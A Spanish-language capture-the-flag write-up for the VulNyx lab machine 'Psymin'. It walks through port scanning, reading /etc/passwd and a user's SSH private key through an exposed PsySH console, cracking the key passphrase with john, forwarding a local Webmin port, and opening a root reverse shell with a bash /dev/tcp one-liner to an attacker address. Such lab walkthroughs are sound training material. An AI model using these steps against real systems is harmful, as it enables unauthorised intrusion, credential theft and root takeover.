cd ~/blog

~/writeups/vulnyx/13-psymin.md

13 - Psymin

easy Linux vulnyx 13-02-2025
Exposed PsySH PHP shell (arbitrary file read)SSH key passphrase crackingWebmin console RCE (port forwarding)
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.96
 nmap -sCV -p 22,80,3000 -oN 02-targeted.txt 192.168.1.96
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 16:38 -03
Nmap scan report for 192.168.1.96
Host is up (0.00028s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, NULL:
|     Psy Shell v0.12.4 (PHP 8.2.20
|     cli) by Justin Hileman
|     version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
|   GetRequest:
|     GET / HTTP/1.0
|     Shell v0.12.4 (PHP 8.2.20
|     cli) by Justin Hileman
|     version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
|     HTTP/1.0
|     Error Undefined constant "GET".
|   HTTPOptions:
|     OPTIONS / HTTP/1.0
|     Shell v0.12.4 (PHP 8.2.20
|     cli) by Justin Hileman
|     version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
|     OPTIONS / HTTP/1.0
|     Error Undefined constant "OPTIONS".
|   Help:
|     HELP
|     Shell v0.12.4 (PHP 8.2.20
|     cli) by Justin Hileman
|     version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
|     HELP
|     Error Undefined constant "HELP".
|   NCP:
|     DmdT^@^@^@
|     ^@^@^@^A^@^@^@^@
|   RTSPRequest:
|     OPTIONS / RTSP/1.0
|     Shell v0.12.4 (PHP 8.2.20
|     cli) by Justin Hileman
|     version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
|     OPTIONS / RTSP/1.0
|_    Error Undefined constant "OPTIONS".
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=2/13%Time=67AE4A52%P=x86_64-pc-linux-gnu%r(NU
SF:LL,8D,"Psy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x
SF:20cli\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\x20is\x20available
SF:\x20at\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4,\x20latest:\x20v0
SF:\.12\.7\)\r\n>\x20")%r(GenericLines,9D,"Psy\x20Shell\x20v0\.12\.4\x20\(
SF:PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\n
SF:New\x20version\x20is\x20available\x20at\x20psysh\.org/psysh\x20\(curren
SF:t:\x20v0\.12\.4,\x20latest:\x20v0\.12\.7\)\r\n>\x20\r\n>\x20\r\n>\x20\r
SF:\n>\x20\r\n>\x20")%r(GetRequest,EA,"GET\x20/\x20HTTP/1\.0\r\n\r\n\r\n\r
SF:\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli
SF:\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\x20is\x20available\x20a
SF:t\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4,\x20latest:\x20v0\.12\
SF:.7\)\r\n>\x20GET\x20/\x20HTTP/1\.0\r\n\r\n\x20\x20\x20Error\x20\x20Unde
SF:fined\x20constant\x20\"GET\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20"
SF:)%r(Help,CB,"HELP\r\n\r\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20
SF:\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\
SF:x20is\x20available\x20at\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4
SF:,\x20latest:\x20v0\.12\.7\)\r\n>\x20HELP\r\n\r\n\x20\x20\x20Error\x20\x
SF:20Undefined\x20constant\x20\"HELP\"\.\r\n\r\n>\x20\r\n>\x20")%r(NCP,38,
SF:"DmdT\^@\^@\^@\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\
SF:x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\^@\^@\^
SF:@\^A\^@\^@\^@\^@")%r(HTTPOptions,F6,"OPTIONS\x20/\x20HTTP/1\.0\r\n\r\n\
SF:r\n\r\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x
SF:20cli\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\x20is\x20available
SF:\x20at\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4,\x20latest:\x20v0
SF:\.12\.7\)\r\n>\x20OPTIONS\x20/\x20HTTP/1\.0\r\n\r\n\x20\x20\x20Error\x2
SF:0\x20Undefined\x20constant\x20\"OPTIONS\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\
SF:x20\r\n>\x20")%r(RTSPRequest,F6,"OPTIONS\x20/\x20RTSP/1\.0\r\n\r\n\r\n\
SF:r\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cl
SF:i\)\x20by\x20Justin\x20Hileman\r\nNew\x20version\x20is\x20available\x20
SF:at\x20psysh\.org/psysh\x20\(current:\x20v0\.12\.4,\x20latest:\x20v0\.12
SF:\.7\)\r\n>\x20OPTIONS\x20/\x20RTSP/1\.0\r\n\r\n\x20\x20\x20Error\x20\x2
SF:0Undefined\x20constant\x20\"OPTIONS\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\x20\
SF:r\n>\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.92 seconds

El puerto 3000 expone una PsySH (consola interactiva de PHP). Nos conectamos:

 nc 192.168.1.96 3000
Psy Shell v0.12.4 (PHP 8.2.20 cli) by Justin Hileman
New version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
>

Comprobamos las funciones deshabilitadas, que incluyen las de ejecución de comandos:

> ini_get('disable_functions');
ini_get('disable_functions');
WARNING: terminal is not fully functional
Press RETURN to continue

= "exec,passthru,shell_exec,system,popen,curl_exec,curl_multi_exec,parse_ini_fil
e,show_source,phpinfo"

No podemos ejecutar comandos, pero sí leer archivos. Identificamos al usuario alfred en /etc/passwd y extraemos su clave SSH:

> file_get_contents('/etc/passwd');
...
root:x:0:0:root:/root:/bin/bash
alfred:x:1000:1000:alfred:/home/alfred:/bin/bash
...

> file_get_contents('/home/alfred/.ssh/id_rsa')
file_get_contents('/home/alfred/.ssh/id_rsa')
WARNING: terminal is not fully functional
Press RETURN to continue

= """
  -----BEGIN OPENSSH PRIVATE KEY-----\n
  ...
  -----END OPENSSH PRIVATE KEY-----\n

Crackeamos la passphrase con john y nos conectamos como alfred, obteniendo la primera flag:

 ssh2john.py id_rsa_alfred > hash
 john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
alfredo          (id_rsa_alfred)
...

 ssh alfred@192.168.1.96 -i id_rsa_alfred
Enter passphrase for key 'id_rsa_alfred': alfredo
alfred@psymin:~$

Para escalar privilegios, listamos los puertos en escucha local y encontramos un servicio en el 10000:

alfred@psymin:~$ ss -tuln
...
tcp         LISTEN       0            4096                   127.0.0.1:10000                  0.0.0.0:*
...

Es una instancia de Webmin que solo escucha localmente, así que reconectamos por SSH haciendo port forwarding del puerto 10000:

alfred@psymin:~$ curl http://127.0.0.1:10000
...
<title>Login to Webmin</title>
...

 sudo ssh -L 1000:127.0.0.1:10000 -i id_rsa_alfred alfred@192.168.1.96
Enter passphrase for key 'id_rsa_alfred': alfredo
alfred@psymin:~$

Accedemos a http://127.0.0.1:1000/ con las credenciales root:root. Una vez dentro, usamos la consola de comandos de Webmin (que se ejecuta como root) para lanzar una reverse shell:

en la web: root@psymin:~# bash -i >& /dev/tcp/192.168.1.7/1234 0>&1

 ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.96:36164.
root@psymin:~#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados